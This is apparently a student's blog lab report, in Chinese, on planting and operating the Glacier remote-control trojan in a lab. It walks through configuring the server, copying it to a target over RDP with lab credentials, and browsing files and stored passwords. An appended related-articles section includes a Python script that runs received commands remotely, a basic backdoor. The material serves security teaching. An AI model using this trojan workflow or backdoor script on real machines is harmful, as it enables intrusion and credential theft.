冰河木马的使用实验

最新推荐文章于 2025-11-04 14:03:39 发布
原创 最新推荐文章于 2025-11-04 14:03:39 发布 · 9.7k 阅读 · 79 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #服务器 #运维 #windows

本文详述了一次使用冰河木马进行远程监控的实验过程,包括服务端配置、上线目标主机、远程操作及卸载。旨在学习网络安全知识,探讨木马使用与防范。

前言:

作者是一个普通高校学生,在博客上开通了[网络安全学习]专栏,以此激励自己坚持学习。由于是初次进行博客创作、经验不足、可能比较粗糙,如有错漏之处希望大家能够指正、也欢迎大家一起交流学习。

如需查看完整学习博文(笔记)请点击 [网络安全学习] 进行查看

注:本实验只为与大家一起学习探讨网络安全学习,请勿用作恶意途径。

一、实验目的及要求

(1)了解冰河木马的使用

(2)掌握木马防范措施

二、实验仪器、设备或软件

软件:冰河木马名为冰河远程监控软件,在推出伊始便饱受追捧,作为一款强大的远程监控软件,它具有非常丰富的监控功能,包括:自动跟踪目标屏幕变化、记录各种口令信息、获取系统信息、限制系统功能、远程文件操作、注册表操作、点对点通讯等。

三、实验内容及步骤

一、配置服务端

1.1 双击“G_Client.exe”打开冰河软件。如图 1 所示。

img

图1打开冰河软件

1.2 点击菜单栏中的“设置”->“配置服务器程序”打开“服务器配置”对话框,设置“访问口令”、“进 程名称”等选项。如图 2 所示。

img

图2服务器配置

1.3 点击“确定”按钮完成服务端程序配置。

二、上线目标主机

2.1 依次点击“开始”->“运行”,输入命令“mstsc”打开“远程桌面连接”对话框。如图 3 所示。

img

图3打开远程桌面连接

2.2 点击“选项”按钮,选择“本地资源”标签,勾选“磁盘驱动器”一栏。如图 4 所示。

img

图4设置本地资源

2.3 切换到“常规”选项卡,“计算机”一栏填入目标主机地址“192.168.168.200”,“用户名”一栏填入“Administrator”,“密码”一栏填入“aa123456”。如图 5 、6所示。

img

图5 远程桌面连接配置

img

图6 远程桌面连接配置

2.4 点击“连接”按钮,弹出的安全警告可忽略,成功连接到目标机,打开“我的电脑”->“\tsclient\C\Documents andSettings\Administrator\桌面\网络安全\冰河木马安全测试”,将“G_Server.exe”复制到桌面。如图 7 所示。

img

图7 把服务器复制到目标机上

2.5 双击“G_Server.exe”,关闭远程连接。回到冰河主窗口,选择工具栏中的第一个图标“添加主机”,输入内容。如图 8 所示。

img

图8添加主机

2.6 点击“确定”按钮即可,展开“文件管理器”中的“target”->“C”即可查看目标主机中的文件。如图 9 所示。

img

图9查看目标主机中的文件

2.7 在“命令控制台”窗口中,可以对目标机发送各类命令获取信息。如图 10、11、12、13、14 所示。

img

图10查看系统信息及口令

img

图11历史口令查看

img

图12进程管理查看

img

图13窗口管理

img

图14服务器配置

2.9、冰河木马的卸载,如图15、16、17所示。

img

图15卸载冰河软件

img

图16卸载完毕

img

图17卸载完毕

四、实验结论

1、实验结果

利用冰河病毒软件成功实施了入侵。

五、往期博文

请点击 [网络安全学习] 进行查看

冰河木马实验(V8.4)
野原新之助
11-20 1万+
简述: 百科词条 冰河木马开发于1999年,跟灰鸽子类似,在设计之初,开发者的本意是编写一个功能强大的远程控制软件。但一经推出,就依靠其强大的功能成为了黑客们发动入侵的工具,并结束了国外木马一统天下的局面,跟后来的灰鸽子等等成为国产木马的标志和代名词。 冰河服务器端程序为G-server.exe,客户端程序为G-client.exe,默认连接端口为7626。其中攻击者使用G-client.e...
木马攻击实验
qq_45768092的博客
10-19 3418
木马攻击实验 计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能表面无害的恶意代码,是具备破坏和删除文件、发送密码、记录键盘等特殊功能的后门程序。 学员需在本实验中通过“冰河”木马的使用,掌握木马的工作原理以及清除方法。 实验简介 实验所属系列:系统安全攻防技术与实践 实验对象: 本科/专科信息安全专业 相关课程及专业:计算机基础,网络安全 实验时数(学分):2学时 实验类别:实践实验类 预备知识 木马是隐藏在正常程序中的具有特殊功能恶意代码,是具备破坏,删除和修改文件,发送密码,记录键盘,实施Dos攻击
网络安全实验报告-冰河木马实验.doc
06-24
网络安全实验报告-冰河木马实验.doc
网络安全实验报告冰河木马实验.doc
05-08
网络安全实验报告冰河木马实验.doc
木马攻击实验,零基础入门到精通,看这一篇就够了!
分享Python知识
11-04 991
实验所属系列:系统安全攻防技术与实践实验对象: 本科/专科信息安全专业相关课程及专业:计算机基础,网络安全实验时数(学分):2学时实验类别:实践实验类。
冰河木马使用
我还在的博客
10-06 1万+
冰河木马使用0x00 前言0x01 环境0x02 利用过程 0x00 前言 这是我对冰河木马使用的学习记录。 0x01 环境 服务端:windows XP sp3 客户端:windows XP sp3 0x02 利用过程 1.相互ping通 2.在其中一台windows XP sp3上打开冰河2004的客户端 3.文件---->配置服务器的程序---->设置访问口令----&gt...
国产木马冰河2.2
weixin_30598225的博客
03-24 1450
本文主要讲述用木马攻击别人电脑,国产木马冰河2.2很不错的软件,看完本文后你可以准备一下软件, 来试试。呵呵 别做违法的事情哦。本文的主要目的是让大家了解木马的攻击过程,熟悉了,就好防范了。 开始了。。。 步骤如下: 首先的第一步是: 所谓磨刀不误砍柴工嘛。。。 下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河 2.2的控制端。 ...
<网络安全>《40 网络攻防专业课<第六课 - 木马与防范>》
Else 的博客
02-20 1648
Rootkit是一种特殊的、小巧的木马,Rootkit是攻击者用来隐藏自己的踪迹和保留Root访问权限的工具。通常攻击者通过远程攻击获得目标主机的Root访问权限后,攻击者会在目标主机安装Rootkit,此后他将通过Rootkit这一后门软件保持对目标主机的持续控制。wollf是一个典型的Rootkit工具,它扩展Telnet服务,集成文件传输、Ftp服务器、键盘记录、Sniffer(forwin2konly)、端口转发等功能,可反向连接,可通过参数选择随系统启动或作为普通进程启动。
冰河木马学习之监听服务端失败
weixin_41705627的博客
05-14 3951
这两天老师带我们学习木马,主要是拿冰河木马练练手;实验的时候我发现我明明步骤没有问题冰河服务端的7626端口也是开启的,但是冰河的客户端一直监听不到服务端;经过了各种尝试之后发现只是一个小操作问题;在这里记录一下,顺便复习一下冰河; 0x00 实验前准备 冰河木马毕竟比较久远了,它是只能在32位的操作系统上运行的,如果运行在64位操作系统上你会发现7626端口并没有开启而且注册表中也没有添加上注册项 ** 攻击机:windows xp 32位 目标机:windows xp 32冰河木马: 链接:
冰河木马实验
qq_45785457的博客
11-15 1万+
实验目的 1. 本次实验为考核实验,需要独立设计完成一次网络攻防的综合实验。设计的实验中要包括以下几个方面内容: (1) 构建一个具有漏洞的服务器,利用漏洞对服务器进行入侵或攻击; (2) 利用网络安全工具或设备对入侵与攻击进行检测; (3) 能有效的对漏洞进行修补,提高系统的安全性,避免同种攻击的威胁。 2. 网络攻防综合实验将从实验设计、实验过程、实验结果、实验报告几个方面,对学生的综合实验能力进行锻炼。 【注意事项】 1.本木马程序用于实验目的,面向实验演示,侧重于演示和说明病毒的内在原理
冰河木马简易使用 ——病毒木马 003
jammny
06-03 1万+
前言: 冰河木马是一种远程控制木马,这次主要想认识一下利用冰河来控制目标主机的整个流程,其实冰河是巨老版本的木马,在很多版本较新的WIN系统即使不开杀毒软件,运行冰河服务端也不能开启7626端口。因此这里用的是win2003当靶机,win7当攻击机器。 步骤一: 准备好冰河木马,第一个是客户端,放在攻击机上进行控制,第二个是服务端,放到靶机上的 对冰河服务器程序G_ Server.exe进行配置,配置好了放到靶机上 步骤2:在靶机上运行g_server.exe,然后查看自己的端..
网络安全基础(木马、概述、冰河木马实验
Pluto.的博客
12-10 5407
文章目录网络安全基础一、木马1. 概述2. 特性3. 组成4. 危害5. 传播途径6. 模拟实验 网络安全基础 一、木马 1. 概述 木马通常成为黑客程序,恶意代码,也称特洛伊木马,是一个基于远程控制的黑客工具,木马程序表面上是无害的,甚至对没有警戒的用户还颇有吸引力,它们经常隐藏在游戏或图形软件中,但它们却隐藏着恶意。 2. 特性 隐蔽性 将自己伪装成合法应用程序,使得用户难以识别,这是木马病毒的首要也是重要的特征。 潜伏性 木马病毒隐蔽的主要手段是欺骗,经常使用伪装的手段将自己合法化。例如,使用合法的
冰河木马使用(纯属学习)
热门推荐
Prodigal
11-26 5万+
冰河木马准备工作第一步第二步 冰河木马以及灰鸽子木马都可以实现远程控制。 一下举例冰河木马软件使用 准备工作 要向看到现象 必须用虚拟机,因为外面系统,我的是win10,即使关闭防火墙,关闭360,也会被自动删除冰河木马,因为这种木马很老,已经被列入检测的范围内,所以一般都会被干掉。 1、虚拟机中安装,两个win7 32位系统,或者一个32位一个64位,32位梓潼作为攻击目标靶机,另一个作为攻击者...
【网络安全实验冰河木马
m0_72892640的博客
03-19 2003
1、了解木马攻击的种类及特点;2、熟悉木马工具;3、掌握木马攻击的种类、攻击方式及防御手段客户端:Windows7虚拟机(IP:192.168.127.107)攻击者服务器端:Windows Server 2003虚拟机 (192.168127.139)受害主机两台虚拟机,分别作为攻击机和靶机。攻击机和靶机在同一局域网内,确保网络连通性。客户端:Windows7(IP:192.168.127.107)攻击者。
2.1)【经典木马-冰河木马】详细介绍,原理、使用方法
07-09 1万+
【经典木马-冰河木马
【软考】冰河木马
王佑辉的博客
07-23 1315
5.教育和培训:提高用户识别和应对冰河木马威胁的能力,教育用户如何验证电子邮件的发件人身份,以及在点击链接或下载附件之前进行安全检查。4.获取系统信息:获取受害计算机的多项系统数据,如计算机名、注册公司、当前用户、系统路径、操作系统版本等。1.安装可靠的防火墙和杀毒软件:确保软件是最新版本,并及时更新病毒数据库,以检测和删除潜在的冰河木马2.恶意网站下载:用户在浏览互联网时,可能会访问到被感染的恶意网站,下载包含冰河木马的程序文件。1.冰河22:是冰河木马的新变种,具有更强的破坏力和控制能力。
图解冰河木马一次使用过程
bcbobo21cn的专栏
07-10 3万+
首先搜索 冰河木马 ,然后下载;一下载好,360即报木马; 因为目前是我们准备尝试一下干坏事,恢复之;信任之; 解压之后又报病毒; 恢复; 看下,一个客户端;一个服务端; 先走客户端;360发现 Trojan.Generic; 信任之;防火墙阻止,允许在专用网络上运行; 一跑起来报了个访问违例;启动画面还不错;
实验二木马分析(控制分析)实验实验冰河木马实验
qq_30600405的博客
10-31 1万+
木马分析(隐藏分析)实验 木马分析(控制分析)实验 木马植入方法实验---冰河木马
木马冰河之原理篇(深入浅出看木马)
Inside Windows
11-05 5536
主题:木马冰河之原理篇(转载)    在网上,大家最关心的事情之一就是木马:最近出了新的木马吗?木马究竟能实现哪些功能?木马如何防治?木马究竟是如何工作的?本文试图以我国最著名的木马之一 冰河为例,向大家剖析木马的基本原理,为大家揭开木马的神秘面纱。   木马冰河是用delphi和C++Builder写的,为了便于大家理解,我将用相对比较简单的VB来说明它,其中涉及到一些WinSock编程和Win
冰河木马实验Linux
最新发布
11-12
提供的参考引用中未涉及Linux系统下冰河木马实验的相关内容。冰河木马是一款曾经较为知名的木马程序,在Linux系统下进行冰河木马实验,一般可从以下方面开展: ### 实验环境搭建 需要准备一台Linux系统的虚拟机,可选用常见的Linux发行版如Ubuntu、CentOS等。同时可能需要一个模拟的目标网络环境。 ### 木马生成 在Linux系统中,可能需要使用特定的工具来生成类似冰河木马功能的恶意程序。不过,现在很多正规的安全工具不会直接支持生成木马,且制造和使用木马用于非法目的是违法的,这里仅作理论探讨。可能会使用一些脚本语言结合网络编程的知识来模拟其部分功能。 ### 植入与控制 将生成的“木马”程序植入到目标Linux系统中,可能是通过漏洞利用、社会工程学等方式。植入后,要实现对目标系统的控制,比如获取目标系统的信息、执行命令等。 ### 检测与防范 使用Linux系统自带的安全工具如防火墙(iptables)、入侵检测系统(Snort等)来检测和防范木马的攻击,分析木马的行为特征,以提高系统的安全性。 以下是一个简单的Python脚本示例,模拟一个简单的远程控制功能(仅作学习,不可用于非法用途): ```python import socket # 服务端代码 def server(): server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', 8888)) server_socket.listen(1) print("Waiting for connection...") conn, addr = server_socket.accept() print(f"Connected by {addr}") while True: command = input("Enter command: ") conn.sendall(command.encode()) if command.lower() == 'exit': break data = conn.recv(1024) print(data.decode()) conn.close() server_socket.close() # 客户端代码 def client(): client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect(('127.0.0.1', 8888)) while True: data = client_socket.recv(1024) command = data.decode() if command.lower() == 'exit': break import subprocess result = subprocess.getoutput(command) client_socket.sendall(result.encode()) client_socket.close() ```
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值